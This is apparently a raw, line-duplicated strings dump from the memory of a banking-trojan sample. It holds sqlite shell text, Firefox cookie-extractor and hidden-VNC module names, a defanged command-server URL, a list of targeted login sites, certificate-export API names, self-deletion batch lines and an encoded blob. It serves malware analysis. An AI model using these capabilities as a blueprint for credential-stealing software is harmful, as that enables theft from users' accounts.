.prompt MAIN CONTINUE Replace the standard prompts

.prompt MAIN CONTINUE Replace the standard prompts

.quit Exit this program

.quit Exit this program

.read FILENAME Execute SQL in FILENAME

.read FILENAME Execute SQL in FILENAME

.restore ?DB? FILE Restore content of DB (default "main") from FILE

.restore ?DB? FILE Restore content of DB (default "main") from FILE

.schema ?TABLE? Show the CREATE statements

.schema ?TABLE? Show the CREATE statements

.separator STRING Change separator used by output mode and .import

.separator STRING Change separator used by output mode and .import

.show Show the current values for various settings

.show Show the current values for various settings

.stats ON|OFF Turn stats on or off

.stats ON|OFF Turn stats on or off

.tables ?TABLE? List names of tables

.tables ?TABLE? List names of tables

.timeout MS Try opening locked tables for MS milliseconds

.timeout MS Try opening locked tables for MS milliseconds

.trace FILE|off Output each SQL statement as it is run

.trace FILE|off Output each SQL statement as it is run

.vfsname ?AUX? Print the name of the VFS stack

.vfsname ?AUX? Print the name of the VFS stack

.width NUM1 NUM2 ... Set column widths for "column" mode

.width NUM1 NUM2 ... Set column widths for "column" mode

.timer ON|OFF Turn the CPU timer measurement on or off

.timer ON|OFF Turn the CPU timer measurement on or off

Error: unable to open database "%s": %s

Error: unable to open database "%s": %s

Error: cannot open "%s"

Error: cannot open "%s"

Error: %s

Error: %s

PRAGMA foreign_keys=OFF;

PRAGMA foreign_keys=OFF;

SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'

SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'

SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'

SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')

SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL

SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()

SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()

import

import

Error: non-null separator required for import

Error: non-null separator required for import

SELECT * FROM %s

SELECT * FROM %s

INSERT INTO %s VALUES(?

INSERT INTO %s VALUES(?

Error: %s line %d: expected %d columns of data but found %d

Error: %s line %d: expected %d columns of data but found %d

SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1

SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1

SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1

SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1

Error: querying sqlite_master and sqlite_temp_master

Error: querying sqlite_master and sqlite_temp_master

Error: invalid arguments: "%s". Enter ".help" for help

Error: invalid arguments: "%s". Enter ".help" for help

Error: cannot open pipe "%s"

Error: cannot open pipe "%s"

Error: cannot write to "%s"

Error: cannot write to "%s"

CREATE TABLE sqlite_master (

CREATE TABLE sqlite_master (

CREATE TEMP TABLE sqlite_temp_master (

CREATE TEMP TABLE sqlite_temp_master (

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END

%9.9s: %s

%9.9s: %s

SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1

%s%-*s

%s%-*s

iskeyword

iskeyword

ambiguous option name: "%s"

ambiguous option name: "%s"

Error: invalid testctrl option: %s

Error: invalid testctrl option: %s

%d (0xx)

%d (0xx)

Error: testctrl %s takes a single int option

Error: testctrl %s takes a single int option

Error: testctrl %s takes no options

Error: testctrl %s takes no options

Error: testctrl %s takes a single unsigned int option

Error: testctrl %s takes a single unsigned int option

Error: CLI support for testctrl %s not implemented

Error: CLI support for testctrl %s not implemented

SQLite %s %s

SQLite %s %s

Error: unknown command or invalid arguments: "%s". Enter ".help" for help

Error: unknown command or invalid arguments: "%s". Enter ".help" for help

Error: near line %d:

Error: near line %d:

%s %s

%s %s

Error: incomplete SQL: %s

Error: incomplete SQL: %s

%s: Error: cannot locate your home directory

%s: Error: cannot locate your home directory

%s/.sqliterc

%s/.sqliterc

-- Loading resources from %s

-- Loading resources from %s

Usage: %s [OPTIONS] FILENAME [SQL]

Usage: %s [OPTIONS] FILENAME [SQL]

FILENAME is the name of an SQLite database. A new database is created

FILENAME is the name of an SQLite database. A new database is created

sqlite>

sqlite>

SQLite header and source version mismatch

SQLite header and source version mismatch

no such VFS: "%s"

no such VFS: "%s"

%s: Error: too many options: "%s"

%s: Error: too many options: "%s"

%s: Error: missing argument for option: %s

%s: Error: missing argument for option: %s

Error: unable to process SQL "%s"

Error: unable to process SQL "%s"

%s: Error: unknown option: %s

%s: Error: unknown option: %s

%s/.sqlite_history

%s/.sqlite_history

SQLite version %s %.19s

SQLite version %s %.19s

Enter ".help" for instructions

Enter ".help" for instructions

Enter SQL statements terminated with a ";"

Enter SQL statements terminated with a ";"

zcÁ

zcÁ

%System%\regsvr32.exe

%System%\regsvr32.exe

GetCPInfo

GetCPInfo

]

]

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

KERNEL32.DLL

KERNEL32.DLL

ole32.dll

ole32.dll

ffcookieextractor.dll

ffcookieextractor.dll

_getFirefoxCookie

_getFirefoxCookie

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

888816666554443

888816666554443

6666554443

6666554443

!6666554443

!6666554443

%AppData%\Mozilla\Firefox

%AppData%\Mozilla\Firefox

\profiles.ini

\profiles.ini

\cookies.sqlite

\cookies.sqlite

Kernel32.dll

Kernel32.dll

regsvr32.exe_3264_rwx_01000000_00005000:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

USER32.dll

USER32.dll

ole32.dll

ole32.dll

regsvr32.pdb

regsvr32.pdb

_wcmdln

_wcmdln

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

Excessive # of DLL's on cmdline

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

REGSVR32.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

OleUninitialize failed.["%1" is not an executable file and no registration

OleUninitialize failed.["%1" is not an executable file and no registration

new.exe_3664:

.text

.text

`.rdata

`.rdata

@.data

@.data

a%FnQU

a%FnQU

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

EnumChildWindows

EnumChildWindows

EnumWindows

EnumWindows

USER32.dll

USER32.dll

\d.nC

\d.nC

v1%ULRg

v1%ULRg

]j'

]j'

)%uj>_

)%uj>_

.io*U

.io*U

dxKeY

dxKeY

ntdll.dll

ntdll.dll

setup.dat

setup.dat

regsvr32.exe_3384_rwx_00070000_00047000:

.text

.text

`.data

`.data

.reloc

.reloc

update.exe

update.exe

config.bin

config.bin

%0&!%F

%0&!%F

?)500>(8

?)500>(8

7-52&

7-52&

,%)4.5(";$2

,%)4.5(";$2

:'$!71689/

:'$!71689/

-0=).?,7

-0=).?,7

60/)4:5

60/)4:5

-*?)2

-*?)2

>5;(4-2>)4 }744

>5;(4-2>)4 }744

"?5&"5%3%/

"?5&"5%3%/

398>7="'

398>7="'

;!)5:. =##

;!)5:. =##

Z#%xDVOE

Z#%xDVOE

(00(7> 59

(00(7> 59

$6>59$=1

$6>59$=1

^EXKSQN_^%X Sf

^EXKSQN_^%X Sf

PR_OpenTCPSocket

PR_OpenTCPSocket

%s%s%s

%s%s%s

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

ole32.dll

ole32.dll

gdi32.dll

gdi32.dll

?

?

value=[%s], code=[%s]

value=[%s], code=[%s]

HTTP/1.1

HTTP/1.1

HTTP/1.0

HTTP/1.0

hXXps://

hXXps://

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

HTTP/1.

HTTP/1.

X-WebKit-CSP

X-WebKit-CSP

hXXp://VVV.google.com/webhp

hXXp://VVV.google.com/webhp

%COMMANDSERVER%

%COMMANDSERVER%

hXXp://127.0.0.1:%u/

hXXp://127.0.0.1:%u/

X-Type: %s

X-Type: %s

_getFirefoxCookie

_getFirefoxCookie

hXXp://

hXXp://

atmos_hvnc.module

atmos_hvnc.module

atmos_ffcookie.module

atmos_ffcookie.module

atmos_video.module

atmos_video.module

userenv.dll

userenv.dll

del "%s"

del "%s"

if exist "%s" goto d

if exist "%s" goto d

del /F "%s"

del /F "%s"

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

urlmon.dll

urlmon.dll

cabinet.dll

cabinet.dll

hXXp://xxxxxxxx.com/xxxx/xxxx.php

hXXp://xxxxxxxx.com/xxxx/xxxx.php

%s, u %s %u u:u:u GMT

%s, u %s %u u:u:u GMT

; charset=%s

; charset=%s

HTTP/1.1 %u %s

HTTP/1.1 %u %s

Date: %s

Date: %s

Content-Length: %u

Content-Length: %u

Expires: %s

Expires: %s

Content-Type: %s%s

Content-Type: %s%s

ID: %s

ID: %s

value_%s

value_%s

value_%s_%s

value_%s_%s

%s = "%s";

%s = "%s";

*.facebook.com

*.facebook.com

*.twitter.com

*.twitter.com

*.instagram.com

*.instagram.com

*.booking.com

*.booking.com

*.sharepoint.com

*.sharepoint.com

*.yahoo.com

*.yahoo.com

login.yahoo.com

login.yahoo.com

*.google.com

*.google.com

accounts.google.com

accounts.google.com

192.168.*.*

192.168.*.*

127.0.0.1

127.0.0.1

*/wp-login.php*

*/wp-login.php*

*.xn--p1ai

*.xn--p1ai

Cookie: %s

Cookie: %s

Referer: %s

Referer: %s

Accept: %s

Accept: %s

Accept-Language: %s

Accept-Language: %s

Accept-Encoding: %s

Accept-Encoding: %s

SSSh8

SSSh8

9.tI3

9.tI3

CreatePipe

CreatePipe

GetWindowsDirectoryW

GetWindowsDirectoryW

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

RegCreateKeyW

RegCreateKeyW

RegEnumKeyW

RegEnumKeyW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

UrlUnescapeA

UrlUnescapeA

SHDeleteKeyW

SHDeleteKeyW

PathIsURLW

PathIsURLW

SHLWAPI.dll

SHLWAPI.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

Secur32.dll

Secur32.dll

GDI32.dll

GDI32.dll

WS2_32.dll

WS2_32.dll

PFXImportCertStore

PFXImportCertStore

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertOpenSystemStoreW

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestA

HttpSendRequestA

HttpSendRequestA

HttpEndRequestW

HttpEndRequestW

GetUrlCacheEntryInfoW

GetUrlCacheEntryInfoW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

InternetCrackUrlA

InternetCrackUrlA

InternetCrackUrlW

InternetCrackUrlW

WININET.dll

WININET.dll

OLEAUT32.dll

OLEAUT32.dll

NETAPI32.dll

NETAPI32.dll

VERSION.dll

VERSION.dll

NtQueryKey

NtQueryKey

ntdll.dll

ntdll.dll

PSSSSSSh

PSSSSSSh

SSSh4

SSSh4

SUWt^Ht[Ht.Huc

SUWt^Ht[Ht.Huc

2!242:2?2[2

2!242:2?2[2

Chrome

Chrome

Firefox

Firefox

nnspr4.dll

nnspr4.dll

nss3.dll

nss3.dll

chrome.dll

chrome.dll

Process (u minute): %s

Process (u minute): %s

Input: %s

Input: %s

X-TS-Rule-Name: %s

X-TS-Rule-Name: %s

X-TS-Rule-PatternID: %u

X-TS-Rule-PatternID: %u

X-TS-BotID: %s

X-TS-BotID: %s

X-TS-Domain: %s

X-TS-Domain: %s

X-TS-SessionID: %s

X-TS-SessionID: %s

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

X-TS-Header-Cookie: %S

X-TS-Header-Cookie: %S

X-TS-Header-Referer: %S

X-TS-Header-Referer: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-UserAgent: %S

X-TS-Header-UserAgent: %S

kernel32.dll

kernel32.dll

Global\XXX

Global\XXX

Company: %s

Company: %s

Product: %s

Product: %s

Version: %s

Version: %s

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall

%u: %s | %s | %s

%u: %s | %s | %s

%sd1%

%sd1%

%sd2%

%sd2%

Name: %s

Name: %s

Path: %s

Path: %s

Hash: %s

Hash: %s

Time: u.u.u

Time: u.u.u

\StringFileInfo\xx\%s

\StringFileInfo\xx\%s

"%s" %s

"%s" %s

/c "%s"

/c "%s"

%sx.%s

%sx.%s

%sx

%sx

SELECT * FROM %s

SELECT * FROM %s

Rapport

Rapport

sXXXX

sXXXX

d*.swf

d*.swf

*.flv

*.flv

*.png

*.png

*.jpg

*.jpg

*.ico

*.ico

*.gif

*.gif

*.css

*.css

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

odobdima.xia

odobdima.xia

:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb

:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

zaodxiibaru.ilb

zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

regsvr32.exe_3384_rwx_000D0000_000C0000:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp4

IWebBrowserApp4

IWebBrowser2l

IWebBrowser2l

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

3,313[3`3

3,313[3`3

829

829

=.=3=[=`=

=.=3=[=`=

>!>&>7>

>!>&>7>

7)707;7@7

7)707;7@7

= =$=,=_=

= =$=,=_=

?0'101>1

?0'101>1

: :&: :}:

: :&: :}:

?,?;?@?^?

?,?;?@?^?

8 8$8(8,808

8 8$8(8,808

c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn 